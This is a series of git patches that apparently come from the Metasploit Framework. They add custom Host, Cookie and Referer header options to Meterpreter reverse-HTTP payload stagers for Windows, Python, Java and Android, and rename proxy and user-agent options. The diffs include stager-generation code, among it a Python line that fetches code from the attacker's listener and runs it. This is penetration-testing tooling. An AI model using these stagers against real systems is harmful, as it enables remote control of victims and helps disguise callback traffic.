^ + + if custom_headers + asm << %Q^ + push -1 ; dwHeadersLength (assume NULL terminated) [3] + call get_req_headers ; lpszHeaders (pointer to the custom headers) [2] + db #{custom_headers} + get_req_headers: + ^ + else + asm << %Q^ push ebx ; HeadersLength (0) [3] push ebx ; Headers (NULL) [2] + ^ + end + + asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index a9048731b4..4821709236 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb @@ -36,7 +36,10 @@ module Payload::Windows::ReverseHttp_x64 OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]) + OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']]), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) ], self.class) end @@ -52,14 +55,14 @@ module Payload::Windows::ReverseHttp_x64 conf = { ssl: opts[:ssl] || false, - host: ds['LHOST'], + host: ds['LHOST'] || '127.127.127.127', port: ds['LPORT'], retry_count: ds['StagerRetryCount'], - retry_wait: ds['StagerRetryWait'] + retry_wait: ds['StagerRetryWait'] } # add extended options if we do have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:url] = luri + generate_uri(opts) conf[:exitfunk] = ds['EXITFUNC'] conf[:ua] = ds['MeterpreterUserAgent'] @@ -68,6 +71,7 @@ module Payload::Windows::ReverseHttp_x64 conf[:proxy_user] = ds['PayloadProxyUser'] conf[:proxy_pass] = ds['PayloadProxyPass'] conf[:proxy_type] = ds['PayloadProxyType'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:url] = luri + generate_small_uri @@ -76,6 +80,22 @@ module Payload::Windows::ReverseHttp_x64 generate_reverse_http(conf) end + # + # Generate the custom headers string + # + def get_custom_headers(ds) + headers = "" + headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] + headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] + headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + + if headers.length > 0 + headers + else + nil + end + end + # # Generate and compile the stager # @@ -89,6 +109,7 @@ module Payload::Windows::ReverseHttp_x64 pop rbp ; rbp now contains the block API pointer #{asm_reverse_http(opts)} ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string end @@ -137,10 +158,23 @@ module Payload::Windows::ReverseHttp_x64 # Proxy options? space += 200 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end + # + # Convert a string into a NULL-terminated ASCII byte array + # + def asm_generate_ascii_array(str) + (str.to_s + "\x00"). + unpack("C*"). + map{ |c| "0x%.2x" % c }. + join(",") + end + # # Generate an assembly stub with the configured feature set and options. # @@ -154,6 +188,7 @@ module Payload::Windows::ReverseHttp_x64 # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS # @option opts [String] :proxy_user The optional proxy server username # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # @@ -180,6 +215,8 @@ module Payload::Windows::ReverseHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : opts[:proxy_user] proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : opts[:proxy_pass] + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_ascii_array(opts[:custom_headers]) + http_open_flags = 0 set_option_flags = 0 @@ -327,17 +364,15 @@ module Payload::Windows::ReverseHttp_x64 if retry_count > 0 asm << %Q^ - push #{retry_count} - pop rdi + push #{retry_count} + pop rdi ^ end - asm << %Q^ retryrequest: ^ - if opts[:ssl] asm << %Q^ internetsetoption: @@ -351,15 +386,30 @@ module Payload::Windows::ReverseHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - httpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) + xor r9, r9 ; lpszVersion (NULL) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwOptionalLength (0) diff --git a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb index 7ba6de3b35..358115e464 100644 --- a/lib/msf/core/payload/windows/x64/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_winhttp.rb @@ -30,24 +30,26 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate the first stage # def generate(opts={}) + ds = opts[:datastore] || datastore conf = { - ssl: opts[:ssl] || false, - host: datastore['LHOST'] || '127.127.127.127', - port: datastore['LPORT'] + ssl: opts[:ssl] || false, + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'] } # Add extra options if we have enough space - if self.available_space && required_space <= self.available_space + if self.available_space.nil? || required_space <= self.available_space conf[:uri] = luri + generate_uri - conf[:exitfunk] = datastore['EXITFUNC'] + conf[:exitfunk] = ds['EXITFUNC'] conf[:verify_cert_hash] = opts[:verify_cert_hash] - conf[:proxy_host] = datastore['PayloadProxyHost'] - conf[:proxy_port] = datastore['PayloadProxyPort'] - conf[:proxy_user] = datastore['PayloadProxyUser'] - conf[:proxy_pass] = datastore['PayloadProxyPass'] - conf[:proxy_type] = datastore['PayloadProxyType'] - conf[:retry_count] = datastore['StagerRetryCount'] - conf[:proxy_ie] = datastore['PayloadProxyIE'] + conf[:proxy_host] = ds['PayloadProxyHost'] + conf[:proxy_port] = ds['PayloadProxyPort'] + conf[:proxy_user] = ds['PayloadProxyUser'] + conf[:proxy_pass] = ds['PayloadProxyPass'] + conf[:proxy_type] = ds['PayloadProxyType'] + conf[:retry_count] = ds['StagerRetryCount'] + conf[:proxy_ie] = ds['PayloadProxyIE'] + conf[:custom_headers] = get_custom_headers(ds) else # Otherwise default to small URIs conf[:uri] = luri + generate_small_uri @@ -95,6 +97,9 @@ module Payload::Windows::ReverseWinHttp_x64 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 + # Custom headers? Ugh, impossible to tell + space += 512 + # The final estimated size space end @@ -115,12 +120,18 @@ module Payload::Windows::ReverseWinHttp_x64 # Generate an assembly stub with the configured feature set and options. # # @option opts [Bool] :ssl Whether or not to enable SSL - # @option opts [String] :uri The URI to request during staging + # @option opts [String] :url The URI to request during staging # @option opts [String] :host The host to connect to # @option opts [Integer] :port The port to connect to - # @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [String] :proxy_host The optional proxy server host to use + # @option opts [Integer] :proxy_port The optional proxy server port to use + # @option opts [String] :proxy_type The optional proxy server type, one of HTTP or SOCKS + # @option opts [String] :proxy_user The optional proxy server username + # @option opts [String] :proxy_pass The optional proxy server password + # @option opts [String] :custom_headers The optional collection of custom headers for the payload. # @option opts [Integer] :retry_count The number of times to retry a failed request before giving up + # @option opts [Integer] :retry_wait The seconds to wait before retry a new request # def asm_reverse_winhttp(opts={}) @@ -169,6 +180,8 @@ module Payload::Windows::ReverseWinHttp_x64 proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user]) proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass]) + custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers]) + http_open_flags = 0x00000100 # WINHTTP_FLAG_BYPASS_PROXY_CACHE secure_flags = ( 0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID @@ -431,15 +444,29 @@ module Payload::Windows::ReverseWinHttp_x64 pop r9 ; dwBufferLength (4 = size of flags) mov r10, #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} ; WinHttpSetOption call rbp + + xor r8, r8 ; dwHeadersLen (0) ^ end - asm << %Q^ - winhttpsendrequest: - mov rcx, rsi ; hRequest (request handle) + if custom_headers + asm << %Q^ + call get_req_headers ; lpszHeaders (pointer to the custom headers) + db #{custom_headers} + get_req_headers: + pop rdx ; lpszHeaders + dec r8 ; dwHeadersLength (assume NULL terminated) + ^ + else + asm << %Q^ push rbx pop rdx ; lpszHeaders (NULL) - xor r8, r8 ; dwHeadersLen (0) + ^ + end + + + asm << %Q^ + mov rcx, rsi ; hRequest (request handle) xor r9, r9 ; lpszVersion (NULL) push rbx ; stack alignment push rbx ; dwContext (0) diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 2c0479c9af..b3f56043cd 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -108,15 +108,19 @@ private cert_hash = "\x00" * CERT_HASH_SIZE cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash] + custom_headers = opts[:custom_headers] || '' + custom_headers = to_str(custom_headers, custom_headers.length + 1) + # add the HTTP specific stuff - transport_data << proxy_host # Proxy host name - transport_data << proxy_user # Proxy user name - transport_data << proxy_pass # Proxy password - transport_data << ua # HTTP user agent - transport_data << cert_hash # SSL cert hash for verification + transport_data << proxy_host # Proxy host name + transport_data << proxy_user # Proxy user name + transport_data << proxy_pass # Proxy password + transport_data << ua # HTTP user agent + transport_data << cert_hash # SSL cert hash for verification + transport_data << custom_headers # any custom headers that the client needs # update the packing spec - pack << 'A*A*A*A*A*' + pack << 'A*A*A*A*A*A*' end # return the packed transport information From 656babe9f4a0826b4398eaf7c66eac96418ec528 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 11 Sep 2017 17:20:50 +1000 Subject: [PATCH 170/254] Custom host header support in python meterp --- .../core/payload/python/meterpreter_loader.rb | 29 +++++++++++++++-- lib/msf/core/payload/python/reverse_http.rb | 31 ++++++++++++++----- 2 files changed, 49 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 95f2335763..2403273415 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -30,7 +30,10 @@ module Payload::Python::MeterpreterLoader register_advanced_options([ OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]), - OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]) + OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) ], self.class) end @@ -88,10 +91,30 @@ module Payload::Python::MeterpreterLoader http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent'] http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST'] http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT'] + http_header_host = opts[:header_host] || ds['HttpHeaderHost'] + http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie'] + http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer'] - # patch in the stageless http(s) connection url - met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(opts[:url])}'") if opts[:url].to_s != '' + # The callback URL can be different to the one that we're receiving from the interface + # so we need to generate it + # TODO: move this to somewhere more common so that it can be used across payload types + callback_url = [ + opts[:url].split(':')[0], + '://', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + ':', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + ds['LURI'].to_s, + opts[:uri].to_s, + '/' + ].join('') + + # patch in the various payload related configuration + met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' + met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' + met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' if http_proxy_host.to_s != '' proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 361ecb3c8e..8f133d034d 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -14,7 +14,10 @@ module Payload::Python::ReverseHttp register_options( [ OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]), - OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]) + OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) ], self.class) end @@ -24,11 +27,14 @@ module Payload::Python::ReverseHttp def generate(opts={}) ds = opts[:datastore] || datastore opts.merge!({ - host: ds['LHOST'] || '127.127.127.127', - port: ds['LPORT'], - proxy_host: ds['PayloadProxyHost'], - proxy_port: ds['PayloadProxyPort'], - user_agent: ds['MeterpreterUserAgent'] + host: ds['LHOST'] || '127.127.127.127', + port: ds['LPORT'], + proxy_host: ds['PayloadProxyHost'], + proxy_port: ds['PayloadProxyPort'], + user_agent: ds['MeterpreterUserAgent'], + header_host: ds['HttpHeaderHost'], + header_cookie: ds['HttpHeaderCookie'], + header_referer: ds['HttpHeaderReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? @@ -104,9 +110,18 @@ module Payload::Python::ReverseHttp cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n" end + headers = [] + headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')" + headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie] + headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer] + cmd << "o=ul.build_opener(*hs)\n" - cmd << "o.addheaders=[('User-Agent','#{var_escape.call(opts[:user_agent])}')]\n" - cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + cmd << "o.addheaders=[#{headers.join(',')}]\n" + if opts[:header_host] + cmd << "exec(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())\n" + else + cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n" + end py_create_exec_stub(cmd) end From f6e9b12b432da22625ed71f6d315619142d2ee79 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 11 Sep 2017 17:33:15 +1000 Subject: [PATCH 171/254] Make sure stageless is supported --- lib/msf/core/payload/python/meterpreter_loader.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 2403273415..370e28dc51 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -98,6 +98,7 @@ module Payload::Python::MeterpreterLoader # The callback URL can be different to the one that we're receiving from the interface # so we need to generate it # TODO: move this to somewhere more common so that it can be used across payload types + uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}" callback_url = [ opts[:url].split(':')[0], '://', @@ -105,7 +106,7 @@ module Payload::Python::MeterpreterLoader ':', (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, ds['LURI'].to_s, - opts[:uri].to_s, + uri, '/' ].join('') From ac79cc9f78d17d60d6cc7e34a331fb4ec48523d5 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 13 Sep 2017 09:26:12 +1000 Subject: [PATCH 172/254] Fix up header string generation in transports --- lib/msf/core/payload/transport_config.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 1f5daf9b42..3c9972c0cf 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb @@ -83,9 +83,15 @@ private def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHost']}\r\n" if ds['HttpHost'] - headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] - headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] + headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] + headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] + headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + + if headers.length > 0 + headers + else + nil + end end def timeout_config(opts={}) From a5af21fa1ab959edb00ab789ef05122b51ebba41 Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 13 Sep 2017 13:00:21 +0800 Subject: [PATCH 173/254] add http headers to Android/Java --- lib/msf/core/payload/android/reverse_http.rb | 12 ++++++++++++ lib/msf/core/payload/java/reverse_http.rb | 11 +++++++++-- lib/msf/core/payload_generator.rb | 2 +- 3 files changed, 22 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/payload/android/reverse_http.rb b/lib/msf/core/payload/android/reverse_http.rb index 4b9e7fcf78..e75e4618a3 100644 --- a/lib/msf/core/payload/android/reverse_http.rb +++ b/lib/msf/core/payload/android/reverse_http.rb @@ -18,6 +18,18 @@ module Payload::Android::ReverseHttp include Msf::Payload::Android include Msf::Payload::UUID::Options + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options([ + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']) + ], self.class) + end + # # Generate the transport-specific configuration # diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 1aff5eab2a..3e6cb675c8 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -24,8 +24,11 @@ module Payload::Java::ReverseHttp def initialize(*args) super register_advanced_options([ - Msf::OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), - Msf::OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) + OptInt.new('Spawn', [true, 'Number of subprocesses to spawn', 2]), + OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), + OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']), + OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']), + OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header']), ]) end @@ -64,6 +67,10 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" + c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"] + c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"] + c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"] + c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"] c << "URL=#{scheme}://#{ds['LHOST']}" c << ":#{ds['LPORT']}" if ds['LPORT'] c << luri diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index c8a3e0629f..a54fb39482 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -298,7 +298,7 @@ module Msf # @return [String] Java payload as a JAR or WAR file def generate_java_payload payload_module = framework.payloads.create(payload) - payload_module.datastore.merge!(datastore) + payload_module.datastore.import_options_from_hash(datastore) case format when "raw", "jar" if payload_module.respond_to? :generate_jar From 1fd7f7c8bc095306a02ea426b11a626b864f8632 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Sep 2017 21:31:11 -0500 Subject: [PATCH 174/254] prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency, this also adds aliases where needed --- lib/msf/core/handler/reverse_http.rb | 60 +++++++++++++------ lib/msf/core/handler/reverse_https_proxy.rb | 14 ++--- lib/msf/core/payload/java/reverse_http.rb | 2 +- lib/msf/core/payload/multi/reverse_http.rb | 16 +++-- .../core/payload/python/meterpreter_loader.rb | 6 +- lib/msf/core/payload/python/reverse_http.rb | 10 ++-- lib/msf/core/payload/transport_config.rb | 12 ++-- lib/msf/core/payload/windows/reverse_http.rb | 28 ++++----- .../core/payload/windows/reverse_winhttp.rb | 14 ++--- .../core/payload/windows/x64/reverse_http.rb | 28 ++++----- .../payload/windows/x64/reverse_winhttp.rb | 14 ++--- .../stagers/windows/reverse_https_proxy.rb | 24 ++++---- 12 files changed, 124 insertions(+), 104 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 5b0db244b5..025e127608 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -52,16 +52,38 @@ module ReverseHttp register_advanced_options( [ - - OptString.new('MeterpreterUserAgent', [false, 'The user-agent that the payload should use for communication', Rex::UserAgent.shortest]), - OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']), - OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']), - OptBool.new('OverrideRequestHost', [false, 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', false]), - OptString.new('OverrideLHOST', [false, 'When OverrideRequestHost is set, use this value as the host name for secondary requests']), - OptPort.new('OverrideLPORT', [false, 'When OverrideRequestHost is set, use this value as the port number for secondary requests']), - OptString.new('OverrideScheme', [false, 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https']), - OptString.new('HttpUnknownRequestResponse', [false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

']), - OptBool.new('IgnoreUnknownPayloads', [false, 'Whether to drop connections from payloads using unknown UUIDs', false]) + OptAddress.new('ReverseListenerBindAddress', + 'The specific IP address to bind to on the local system' + ), + OptBool.new('OverrideRequestHost', + 'Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT', + ), + OptString.new('OverrideLHOST', + 'When OverrideRequestHost is set, use this value as the host name for secondary requests' + ), + OptPort.new('OverrideLPORT', + 'When OverrideRequestHost is set, use this value as the port number for secondary requests' + ), + OptString.new('OverrideScheme', + 'When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https' + ), + OptString.new('HttpUserAgent', + 'The user-agent that the payload should use for communication', + default: Rex::UserAgent.shortest, + aliases: ['MeterpreterUserAgent'] + ), + OptString.new('HttpServerName', + 'The server header that the handler will send in response to requests', + default: 'Apache', + aliases: ['MeterpreterServerName'] + ), + OptString.new('HttpUnknownRequestResponse', + 'The returned HTML response body when the handler receives a request that is not from a payload', + default: '

It works!

' + ), + OptBool.new('IgnoreUnknownPayloads', + 'Whether to drop connections from payloads using unknown UUIDs' + ) ], Msf::Handler::ReverseHttp) end @@ -204,7 +226,7 @@ module ReverseHttp raise ex if (ex) - self.service.server_name = datastore['MeterpreterServerName'] + self.service.server_name = datastore['HttpServerName'] # Add the new resource service.add_resource((luri + "/").gsub("//", "/"), @@ -245,14 +267,14 @@ protected info = {} return @proxy_settings if @proxy_settings - if datastore['PayloadProxyHost'].to_s == '' + if datastore['HttpProxyHost'].to_s == '' @proxy_settings = info return @proxy_settings end - info[:host] = datastore['PayloadProxyHost'].to_s - info[:port] = (datastore['PayloadProxyPort'] || 8080).to_i - info[:type] = datastore['PayloadProxyType'].to_s + info[:host] = datastore['HttpProxyHost'].to_s + info[:port] = (datastore['HttpProxyPort'] || 8080).to_i + info[:type] = datastore['HttpProxyType'].to_s uri_host = info[:host] @@ -266,11 +288,11 @@ protected info[:info] = "socks=#{info[:info]}" else info[:info] = "http://#{info[:info]}" - if datastore['PayloadProxyUser'].to_s != '' - info[:username] = datastore['PayloadProxyUser'].to_s + if datastore['HttpProxyUser'].to_s != '' + info[:username] = datastore['HttpProxyUser'].to_s end - if datastore['PayloadProxyPass'].to_s != '' - info[:password] = datastore['PayloadProxyPass'].to_s + if datastore['HttpProxyPass'].to_s != '' + info[:password] = datastore['HttpProxyPass'].to_s end end diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 997316f688..1642460ad5 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -38,13 +38,13 @@ module ReverseHttpsProxy register_options( [ - OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]), - OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), - OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]), - OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]), - OptEnum.new('PayloadProxyType', [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]), - OptString.new('PayloadProxyUser', [ false, "An optional username for HTTP proxy authentication"]), - OptString.new('PayloadProxyPass', [ false, "An optional password for HTTP proxy authentication"]) + OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"), + OptPort.new('LPORT', "The local listener port", default: 8443), + OptString.new('HttpProxyHost', "The proxy server's IP address", required: true, default: "127.0.0.1", aliases: ['PayloadProxyHost']), + OptPort.new('HttpProxyPort', "The proxy port to connect to", required: true, default: 8080, aliases: ['PayloadProxyPort']), + OptEnum.new('HttpProxyType', 'The proxy type, HTTP or SOCKS', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), + OptString.new('HttpProxyUser', "An optional username for HTTP proxy authentication", aliases: ['PayloadProxyUser']), + OptString.new('HttpProxyPass', "An optional password for HTTP proxy authentication", aliases: ['PayloadProxyPass']) ], Msf::Handler::ReverseHttpsProxy) register_advanced_options( diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 3e6cb675c8..b0c1fc0d66 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -67,7 +67,7 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" - c << "HeaderUser-Agent=#{ds["MeterpreterUserAgent"]}\n" if ds["MeterpreterUserAgent"] + c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"] c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"] c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"] c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"] diff --git a/lib/msf/core/payload/multi/reverse_http.rb b/lib/msf/core/payload/multi/reverse_http.rb index 008f99f5a0..9d9f45de1c 100644 --- a/lib/msf/core/payload/multi/reverse_http.rb +++ b/lib/msf/core/payload/multi/reverse_http.rb @@ -23,14 +23,13 @@ module Payload::Multi::ReverseHttp def initialize(*args) super register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']), - OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']), - OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']), - OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']), - 